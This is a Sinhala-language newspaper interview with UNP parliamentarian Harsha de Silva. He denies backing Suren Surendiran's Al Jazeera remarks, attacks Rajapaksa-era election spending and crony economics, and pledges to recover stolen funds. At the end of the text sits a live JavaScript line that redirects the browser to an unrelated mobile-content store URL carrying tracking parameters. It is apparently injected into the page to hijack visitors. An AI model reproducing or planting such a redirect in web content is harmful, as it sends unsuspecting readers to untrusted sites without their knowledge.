ත‍්‍රස්තවාදය අවශ්‍ය ආණ්ඩුවටයි – එජාප පාර්ලිමේන්තු මන්ත‍්‍රී ආචාර්ය හර්ෂ ද සිල්වා

තරිඳු උඩුවරගෙදර

අල්-ජසීරා නාලිකාවේ සාකච්ඡුාවකදී ගෝලීය ද්‍රවිඩ සංසදයේ සුරේන් සුරේන්ද්‍රන් කළ ප‍්‍රකාශවලට ඔබේ නමත් සම්බන්ධ කරලා පොදු අපේක්ෂකයා බලයට ආවොත් මහින්ද රාජපක්ෂව ජාත්‍යන්තර අධිකරණයට අරන් යනවා කියනවා. ඔබේ පිළිතුර මොකක්ද?

එක්සත් ජාතික පක්ෂයේ සහ මගේ ඔය යුද අධිකරණ සහ ජාත්‍යන්තර පරීක්ෂණ සම්බන්ධයෙන් කිසිම විදියක එකඟතාවක් නැහැ. අපි කිව්වේ අභ්‍යන්තරව මේ ගැන සොයා බලලා ජාත්‍යන්තරයට පිළිතුරු ලබාදෙන්න ඕනෑ කියලා. එල්.එල්.ආර්.සී. වාර්තාවේ තියෙනවා ඒ බව. ඒකම තමයි අපිත් කියන්නේ. එතකොට එතැනින් එහාට මේ එල්ල කරන චෝදනා සම්පූර්ණයෙන්ම බොරු චෝදනා. ජනාධිපති කාර්යාලයට අල්-ජසීරා එකෙන් ලියුමක් ලියලා තියෙනවා. මගේ ළඟ කොපියකුත් තියෙනවා. ඒකෙ තියෙනවා මීට කලින් ඒකට සහභාගිවෙන්න හිටියේ ජනාධිපතිවරයාගේ මාධ්‍ය ප‍්‍රකාශක මොහාන් සමරනායක. ඔහුට එන්න බැරිවෙලා කෙහෙළිය රඹුක්වැල්ල එනවා කියලා තමයි මට කිව්වේ. මම මේ රූපවාහිනී වැඩසටහනට සහභාගි වුණේ කෙහෙළිය සමග සංවාදගත වෙන්න. මම ගියේ ආර්ථිකය ගැන සහ ජනාධිපතිවරණය ගැන මගේ අදහස් ඉදිරිපත් කරන්න. ඒත් මම වැඩසටහනට සම්බන්ධ වෙනකොට හිටියේ රජීව් විජේසිංහත්, ඔය සුරේන් සුරේන්ද්‍රන් කියන පුද්ගලයාත්. රජීව් විජේසිංහ කියන්නේ එතකොට ආණ්ඩුවේ මන්ත‍්‍රීවරයෙක්. විපක්ෂයට ආවේ ඊට පස්සේ. මං දන්නේ කොහොමද ඔහු විපක්ෂයට එනවා කියලා. ජනාධිපතිවරයාත් දැනගෙන හිටියෙ නැත්නම් මෛත‍්‍රීපාල යනවා කියලා මේ මන්ත‍්‍රීවරයෙක් දන්නේ කොහොමද කවුද යන්නෙ කවුද එන්නේ කියලා. ඉතින් මම එකඟ වෙලා වැඩසටහනට සම්බන්ධ වුණා. ආණ්ඩුවේ පුද්ගලයෙක් මම සහ තවත් පුද්ගලයෙක් ඉන්නවා. මම හිටියේ ස්කයිප් එකේ ලංකාවේ. තවත් අයෙක් දෝහාවල. තවත් අයෙක් අයර්ලන්තයේ ඩබ්ලින්වල. අපි එක වැඩසටහනකට ඉඳගත්තේ නැහැ. එතැනදී රජීව් විජේසිංහ සහ සුරේන්ද්‍රන් කියන පුද්ගලයා අතර විවාදයක් හටගැනුණා. මගේ වාරය ආවාම මම, ඕවා අන්තවාදී මත අපි ඒවා පිළිගන්නේ නැහැ කිව්වා. රජීව් ගෙන ආ සමහර මතවාද පිළිනොගන්නා බවත් කිව්වා. එක්සත් ජාතික පක්ෂ මන්ත‍්‍රීවරයෙක් විදියට යුද්ධය මේ රටෙන් තුරන් කරන්න දායක වෙච්ච සියලූදෙනාට පක්ෂ විපක්ෂ භේදයකින් තොරව කෘතඥතාව පළකරනවා කියලාත් කිව්වා. තවදුරටත් මම කිව්වා අපේ ස්ථාවරය මේ ගැටලූ පිළිබඳව අභ්‍යන්තර සොයා බැලීමක් කළ යුතු බවයි කියලා. දැන් එතැනට ආණ්ඩුව තල්ලූවෙලා තියෙනවා. මම පැහැදිලිවම ඒ පුද්ගලයාගේ මතවලට විරුද්ධ වුණා.

ඔබ මේ සිදුවීම ගැන පාර්ලිමේන්තුවේදීත් පැහැදිලි කළා. ඒත් විමල් වීරවංශ සහ පාර්ලිමේන්තුවේ පිරිසක් තවමත් මේ චෝදනාව කර උඩ තියාගෙන යනවා.

ඕනෑම කෙනෙක්ට වැඩසටහනේ වෙච්ච දේ බලන්න පුළුවන්. විවාදයක දෙන්නෙක් කතා කළාම එක් පුද්ගලයෙක් පෙන්වලා එයාගේ මතය අනෙක් කෙනා පිළිගත්තා කියන්න පුළුවන්ද? විමල් වීරවංශත් මමත් විවාද කරන ඡායාරූපයක් පෙන්වලා මෙන්න හර්ෂ ද සිල්වා කියන දේට විමල් එකඟයි කියන්න පුළුවන්ද? මෙයාලා ජීවත්වෙන්නේ ඔය ත‍්‍රස්තවාදය එක්ක. ඔවුන්ටයි ත‍්‍රස්තවාදය අවශ්‍ය.

විමල් වීරවංශ ඇතුළු කණ්ඩායම් සිංහල බෞද්ධ බලවේග ලෙස තමන් හඳුන්වා ගන්නවා. එහෙම කියමින් දූෂිත ඝාතන චෝදනා පවා ලබන ආණ්ඩුවක් රැුකගන්න උත්සාහ කරනවා. සිංහල භාෂාව කතා කරන බෞද්ධයෙක් විදියට ඔබ මේක දකින්නේ කොහොමද?

ඒක හොඳම තර්කයක්. අපට අවශ්‍යවෙන්නේ මේ රටේ සිංහල, දෙමළ, මුස්ලිම්, බර්ගර් ජනතාවගේ හෙට දවස හොඳ කරන්න. අපව පත්කරලා තියෙන්නේ ඒකට. ඔය සමහරු සිංහල බෞද්ධ ලේබල් එකක් නළලෙ ගහගෙන හොරුන්ව බේරන්න බොරු කියන එකම සම්පූර්ණයෙන් අබෞද්ධ ක‍්‍රියාවලියක්.

මේ දිනවල ප‍්‍රචාරණයට ආණ්ඩුව කරන වියදම ගැන ආර්ථික විශේෂඥයෙක් විදියට දකින්නේ කොහොමද?

රජයේ වියදම් කරන ක‍්‍රමවේදයක් තියෙනවා. ඒආර් එෆ්ආර්වලට අනුව තමයි රජයේ මුදල් වියදම් කරන්න පුළුවන්. මම රාජ්‍ය ගිණුම් කාරක සභාවේ සාමාජිකයෙක් හැටියට, පාර්ලිමේන්තුවේ කොමි ටියේ ක‍්‍රියාකාරී සාමාජිකයෙක් හැටියට අපි දකිනවා විගණන වාර්තාවල දූෂිත විදියට මුදල් පරිහරණය කරන අවස්ථා. මේ මැතිවරණවලට වියදම් කරන ප‍්‍රමාණය බැලූවාම අරවා මොනවාද කියලා හිතෙනවා. අර රුපියල් ලක්ෂයක් දෙකක් වියදම් කරපු හැටි ප‍්‍රශ්න කරන්න කාලය වැය කළාට වැඩක් තියෙනවාද? අද කිසිම ඒආර් එකක් එෆ්ආර් එකක් නැතිව රජයේ මුදල් වියදම් කරන්නේ. කිසිම මැතිවරණ නීතියකට යටත් නොවී රජයේ මුදල්වලින් රජයේ සේවකයන් යොදවලා මේ කරන්නේ. අද රටේ මූල්‍ය විනයට පයින් ගහලා කුණු බක්කියට දාලා තමයි මේ වැඬේ කරන්නේ.

දන්සැල්වලටත් ඒ වගේම වියදමක් යනවා.

විගණනයක් කරගන්න බැරි විදියට ලංකාවේ හැම පැත්තෙන්ම වියදම්. හොඳින්ම පේනවා කොච්චර මේ රාජ්‍ය දේපළ කාබාසිනියා කරමින් කටයුතු කරනවාද කියලා. මෛත‍්‍රීපාල මහත්මයා කිව්වේ කටවුට්වලට වියදම් කරන්න ඕනෑ නැහැ, ඒ සල්ලිවලින් වකුගඩු රෝගීන්ට ලේ ශුද්ධ කරන යන්ත‍්‍ර ලබාදෙමු කියලා. මිනිස්සු තේරුම් ගන්න ඕනෑ හැම තැනම රූප එල්ලූවත් බලෙන් ආදරයක් ගන්න බැහැනේ.

එක්සත් ජාතික පක්ෂය රාජ්‍ය බලය ලබාගන්න තිබුණු අවස්ථාව පොදු අපේක්ෂකයා වෙනුවෙන් කැප කළා. පාක්ෂිකයා මේක පිළිගන්නෙ කොහොමද?

අපේ තියෙන්නේ මේ රාජපක්ෂවරුන්ගේ දූෂිත පාලනය අයින් කිරීමේ අරමුණක්. ජාතික සමගි ආණ්ඩුවක් බිහිකිරීමයි අපේ අරමුණ. එක්සත් ජාතික පක්ෂය ඇතුළු පාර්ලිමේන්තුවේ ඉන්න පක්ෂ සමග ඒ ආණ්ඩුව බිහිකරනවා. එතැනදී අපි මේ ඒකාධිපති ජනාධිපති ක‍්‍රමය අහෝසි කරනවා. ඉන්පසුව අපි පක්ෂ දේශපාලනය පටන් ගන්නවා. මේ පොදු විපක්ෂයක්. ජනතා විමුක්ති පෙරමුණ කියලා තිබෙනවා මොකද්ද වෙන්න ඕනෑ කියලා. මේ පක්ෂ සියල්ලම මහින්ද රාජපක්ෂගේ ඒකාධිපති ජනාධිපති ක‍්‍රමය අයින් කරන්නත් එකතුවෙනවා. දෙවනුව තමයි අපි පක්ෂයක් විදියට ආණ්ඩුවක් පිහිටුවන්න වරමක් ඉල්ලන්නේ අපේ ප‍්‍රතිපත්ති මත. ඉනිම් දෙකේ තරගයක අපි ඉනිම් දෙකම සෙල්ලම් කරන්න ඕනෑ. ප‍්‍රජාතන්ත‍්‍රවාදය දිනා ගැනීමයි පළවෙනි ඉනිම.

මහින්ද රාජපක්ෂ පාලනය ගැන ආර්ථිකය පැත්තෙන් ඔබේ විග‍්‍රහය මොකක්ද?

මහින්ද රාජපක්ෂ යුගය අපට පෙනෙයි ආර්ථිකය රටේ සංඛ්‍යා ලේඛනවලට අනුව වසරකට සියයට හතහමාර බැගින් වර්ධනය වී ඇති බව. පාරවල්, කෝච්චි පාරවල්, බිල්ඩින්, කුලූනු හදනවා. ඒත් ගෘහස්ථ ආදායම වැඩිවෙලා තියෙන්නේ අවුරුද්දකට බින්දුවයි දශම පහකින්. කිසිම කාලයකට වඩා සොරකමයි, දූෂණයයි වැඩිපුරම තිබුණේ මහින්ද පාලන යුගයේ. සියයට හතහමාරකින් වර්ධනය වෙද්දී ජනතාවට ලැබෙන්නේ දශම පහක් නම් කෝ ඉතිරි සියයට හත? ඒක තමයි මිනිස්සු අහන්නේ කෝ මේ සංවර්ධනයේ ප‍්‍රතිලාභ අපට. ආණ්ඩුවේ භාණ්ඩාගාරය නවවෙනිදා ගත්තාම අපි පෙන්වලා දෙන්නම්, මිනිස්සුන්ට ඇයි මේක වුණේ, කොහොමද මේ අඩුවීම වුණේ, තොරතුරු දැනගැනීමේ අයිතියක් දෙන්නෙ නැති රජය විසින් කොහොමද මේ හොරකම සිද්ධ කළේ කියලා. පෙබරවාරි මාසෙ වෙනකොට මම පෙන්වන්නම් මේ රටට, කෝ අර අඩුවුණු මුදල් කියලා.

ගජමිතුරු ආර්ථිකය ක‍්‍රියාත්මක වෙන්නේ කොහොමද?

ගජමිතුරු ආර්ථිකය හරහා තමයි මේ වැඬේ වෙන්නේ. මේ රටේ ලැම්බෝගිනි කඩයක් තියෙනවා කියන්නේ, රටවල් කීයක ලැම්බෝගිනි ෂෝ රූම් තියෙනවාද? මොන්ටිබිලෝන් පෑන් විකුණන තැන්, ලූවී විටෝන් පටි විකුණන තැන්, ලක්ෂ එකහමාරක සපත්තු දාගෙන කාටද යන්න පුළුවන්. මාකෝස්ලාගේ, මුබාරක් ලාගේ කාලය වගේ කොහොමද මේ ගජමිතුරො කිහිපදෙනෙක් මේ ආර්ථිකය අල්ල ගන්නේ? යුක්රේනයේ ජනාධි පතිවරයා ඉවත්වෙලා යන වෙලාවෙ ෆයිල් ඔක්කොම විසි කළා වැවකට. මිනිස්සු වැවට පැනලා හැම ෆයිල් එකම වැවෙන් අරගත්තා. මේවා වේලලා සියලූ ෆයිල් නැවත සකස් කළා. ෆේස්බුක් හරහා තරුණ තරුණියො එකතු වෙලා හෝල් එකක් අරගෙන ෆයිල් එකෙන් ෆයිල් එක නැවත සකස් කළා. අධ්‍යයනය කළා. එතකොට දැකපු දේ තමයි මේ එකතුවෙච්ච සල්ලි තිබුණේ සීෂෙල්ස්වල. දූෂණයේ සල්ලි ඔක්කොම තියෙන ෆයිල් එකේ එහා කොණ තමයි සීෂෙල්ස්. ගිය ජනාධිපතිවරයා වැවට ෆයිල් විසිකරලා පැනලා යනකොට මිනිස්සු එකතුවෙලා සල්ලි හොයාගත්තා සීෂෙල් ස්වලින්. ඒ මුදල් දැන් නැවත යුකේ‍්‍රනයට ගේනවා. එතැනින් එහාට අපි බලමු.

එතැනින් එහාට කියන්නේ මොකක්ද?

ෆයිල් විසිකරලා, හංගලා, ගිනි තියලා බේරෙන්න හම්බවෙන්නේ නෑ ඔය ගජමිතුරන්ට. අපි කලින් ඔය ගජමිතුරෝ, කැසිනෝ කාරයෝ, එතනෝල් කාරයෝ, කුඩුකාරයෝ, මිනීමරුවෝ ගැන කතා කළාට දැන් රජයේ මිනිස්සුමනේ ඕවා කියන්නේ. රතන හාමුදුරුවෝ කියනවා. චම්පික ඇමතිවරයා සුදු කරපටි අපරාධකාරයෝ ගැන කියනවා. මෛත‍්‍රීපාල සිරිසේන ඇමතිතුමා කියනවානේ දූෂණය ගැන එතුමාට කතා කරන්නත් එපා කිව්වා කියලා.

හොරකම් කරපු මුදල් නැවත ගේනවා කියලාද කියන්නේ?

අපි උත්සාහ කරනවා හොරකම් කළ හැම සතයක්ම නැවත ගේන්න. අපි හොරකම්වලින් ගහපු ඞීල් කැන්සල් කරනවා. ඒ හරහා සාමාන්‍ය ජනතාවගේ මුදල් ඉතිරි කරගෙන එහි ප‍්‍රතිලාභ ඔවුන්ට ලබාදෙනවා.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;